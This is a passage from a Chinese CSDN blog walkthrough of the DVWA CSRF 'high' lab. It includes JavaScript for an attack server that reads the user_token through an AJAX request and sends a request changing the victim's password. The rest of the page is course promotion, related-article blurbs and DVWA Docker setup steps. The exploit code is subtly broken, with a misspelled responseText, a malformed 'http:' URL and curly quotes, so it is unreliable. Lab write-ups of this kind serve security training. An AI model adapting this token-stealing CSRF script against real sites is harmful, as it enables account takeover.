2024年最全DVWA中CSRF高级_dvwa csrf 高级(1),2024年最新熬夜整理华为最新网络安全笔试题

最新推荐文章于 2024-07-25 22:24:14 发布
最新推荐文章于 2024-07-25 22:24:14 发布
阅读量279 收藏 9
点赞数 3
分类专栏: 程序员 文章标签: 网络安全 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84281748/article/details/138690326
版权

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

        <input type='hidden' name='user_token' value='9eed4c773cd578ed263facc427c1fb78' />
    </form>


(2)再次访问CSRF页面Token值发生了变化,可以确定DVWA生成Token的机制是每次不一样/


(3)过关的核心在于要发送请求给

http://192.168.112.188/dvwa/vulnerabilities/csrf/


页面,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给

http:192.168.112.188/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change


页面完成密码修改


(4)先构造一个Javascript原生代码发送AJAX请求的代码

var tokenUrl=‘http://192.168.112.188/dvwa/vulnerabilities/csrf/’;
var count = 0;
//实例化XMLHttpRequest,用于发送AJAX请求
xmlhttp = new XMLHttpRequest();
//当请求状态发生变化时,触发执行代码
xmlhttp.onreadystatechange = function(){
   //状态码0:请求未初始化,1:服务器连接已建立,2请求已接收,3请求处理中,4请求已完成,且相应已就绪
   if(xmlhttp.readyState == 4&&xmlhttp.status == 200)
  {
       //取得请求的响应,并从响应中通过正则提取Token
       var text = xmlhttp.responesText;
       var regex = /user_token’value=‘(.*?)’ />/;
       var match = text.match(regex);
       //alert(match[1]);
       var token = match[1];
       //发送修改密码的语法
       var changeUrl=‘http:192.168.112.188/dvwa/vulnerabilities/csrf/?user_token=’+token+‘& password_new=123456&password_conf=123456&Change=Change’;
       if(count == 0){
           count = 1; //只发送一次,否则会多次发送
           xmlhttp.open(“GET”,changeUrl,false); //false代表同步方式发送
           xmlhttp.send();
      }
  }
};
xmlhttp.open(“GET”,tokenUrl,false);
xmlhttp.send();


将上述代码放置在攻击服务器上



还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!


王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。


对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!


【完整版领取方式在文末!!】


***93道网络安全面试题***


![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)








![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)





![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)





内容实在太多,不一一截图了


### 黑客学习资源推荐


最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

#### 1️⃣零基础入门


##### ① 学习路线


对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。


![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供:


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84281748
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2024最全网络安全工具大合集_remnux部署(1),网络安全上机面试
2401_84265909的博客
05-05 981
漏洞网站应用平台 (DVWA) 是一个有大量漏洞的 PHP/MySQL 网站应用。– 这个Kali Linux Docker镜像提供了最新版本Kali Linux发行版的最小化安装。– 一个故意的不安全网站应用,用于安全培训,完全使用Javascript开发,包含所有的OWASP Top 10漏洞以及其他的高危漏洞。– OWASP Mutillidae II 网站渗透测试实践系统。
2024最新网络安全-自学笔记_网络安全学习(1),2024最新关于网络安全程序员最近的状况
2401_84265909的博客
05-06 859
和我一起来学习WEB安全吧!----------------------------------理论与实战------------------------------------------------------------------------理论与实战-------------------------------------------------------------------------实战-------------------------------------
宝塔部署DVWA2024最新大厂网络安全面经
2301_76225520的博客
04-20 618
Python编程学习学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
DVWA通关攻略零到一【全】
WX公众号-小白学安全
10-28 4万+
DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
2024网安最全网络安全学习路线-超详细(1)
2401_84281712的博客
05-01 713
5、PHP 文件上传、PHP 错误处理6、PHP 操作 MYSQL 数据库7、PHP 会话管理和控制。
DVWA-CSRF-low级别_csrflow等级(1)
2401_84973153的博客
05-16 289
自我介绍一下,小编13上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Sqlmap使用教程【个人笔记精华整理】,2024最新零基础学习网络安全编程
2401_83974783的博客
04-18 450
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面。4、联合查询注入,可以使用union的情况下的注入。5、堆查询注入,可以同时执行多条语句的执行时的注入。
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 16万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
网络安全入门篇之学习路线_网络安全学习路线,2024网络安全面试真题精选干货整理
2401_83740129的博客
04-21 821
需要学习 SQL 语法,利用常见的数据库 MySQL 学习对应的数据库语法,也是一样,SQL 的一些些高级语法可以了解,主要学习一些理论知识,重点掌握库、表、索引概念,学习SQL编写,学会增删改查数据,如果没有时间完全不学也不影响后续学习,毕竟大家不是做数据库分析师,不需要学太深;重点学习 OSI、TCP/IP 模型,网络协议,网络设备工作原理等内容,随后就要了解广域网、互联网,通过七层和四层模型快速建立起计算机网络的基础概念,各层协议的作用,分别有哪些协议,这些协议在当今的互联网具体是怎么应用的。
Centos7配置Docker镜像加速器-阿里云官方(报错解决repository does not exist or may require ‘docker login’)
01-07
我们在日常学习或者使用docker的时候可能会遇到下载安装镜像速度慢的问题,这里我们就得添加以下国的阿里云镜像就会速度加快 添加阿里云镜像 阿里云网站 按照命令即可,也可以手动创建/ect/docker/daemon.json来用...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
AvaloniaUI的学习
最新发布
lishuangquan1987的博客
07-25 916
官方文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome。
Python编程学习第一篇——Python零基础快速入门(六)(4)异常处理
urhero的专栏
07-25 356
我们已经了解了Python的基本数据类型、变量和基本的逻辑控制语句,基于这些基础知识可以编写一些小程序了,但是在写程序的时候我们会发现,有时候程序并不是按我们预期的方向执行,有的直接报错,有的没有报错,却并未得到我们预期的结果。在这个例子,除数为0会引发ZeroDivisionError异常,我们将异常信息赋值给变量e,并输出"除数不能为0"和异常信息。在这个例子,由于除数不为0,所以没有发生ZeroDivisionError异常,代码会执行else语句块,并输出结果2.0。
Spring Security学习笔记(二)Spring Security认证和鉴权
飞!!!的博客
07-24 780
用户认证的基础Filter,只有UsernamePasswordAuthenticationFilter这一个实现类。...//主要方法//先校验请求url与表单校验提交的url是否一致,不一致执行下一个Filter//一致的话就执行认证逻辑,一般默认的表单提交url是"/login"if (!} else {try {//实现类执行具体的认证逻辑return;//由子类实现具体的验证逻辑...
虚拟机学习
weixin_63374588的博客
07-25 311
虚拟机的优点:虚拟机使用教程:
前端学习1——自学习梳理
qq_63125992的博客
07-24 382
【代码】前端学习1——自学习梳理。
FastAPI(八十)实战开发《在线课程学习系统》接口开发-- 课程列表
mr~li的博客
07-25 362
源码见:"
docker搭建dvwa
08-21
使用Docker搭建DVWA的步骤如下: 1. 首先,确保你的服务器环境满足要求。你需要一个服务器,比如华为云上的服务器,以及安装了CentOS 7.6 64bit操作系统和Docker。 2. 创建数据库、账号密码及授权。进入mysql并执行以下命令: ``` $ mysql mysql> create database dvwa; mysql> create user dvwa@localhost identified by 'p@ssw0rd'; mysql> grant all on dvwa.* to dvwa@localhost; mysql> flush privileges; ``` 3. 下载并部署DVWA。在服务器上执行以下命令: ``` $ cd /var/www/html $ wget https://codeload.github.com/digininja/DVWA/zip/master $ mv master master.zip $ unzip master.zip $ mv DVWA-master /var/www/html/dvwa $ chmod 777 -R /var/www/html $ cd /var/www/html/dvwa/config $ cp config.inc.php.dist config.inc.php ``` 4. 修改DVWA的配置文件。使用vim编辑config.inc.php文件,根据之前创建的数据库、账号和密码进行相应的配置。 5. 拉取基础镜像,并进入容器进行部署。执行以下命令: ``` $ docker run -it -d --name dvwa -p 8444:80 ubuntu $ docker exec -it dvwa /bin/bash ``` 6. 在容器安装基础工具和LAMP环境。执行以下命令: ``` $ apt-get update $ apt-get install -y zip unzip vim wget $ apt-get -y install apache2 mariadb-server php php-mysqli php-gd libapache2-mod-php ``` 7. 启动Apache和MySQL服务。执行以下命令: ``` $ service apache2 start $ service mysql start ``` 8. 现在,你可以通过访问"http://你的ip:8444"来确认DVWA是否成功部署。 请注意,以上步骤仅提供了使用Docker搭建DVWA的基本过程,具体的配置和安装方式可能会根据你的环境和需求有所不同。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Web应用安全 -- DVWA部署(Linux、Docker版)](https://blog.csdn.net/luckcxy/article/details/120259745)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值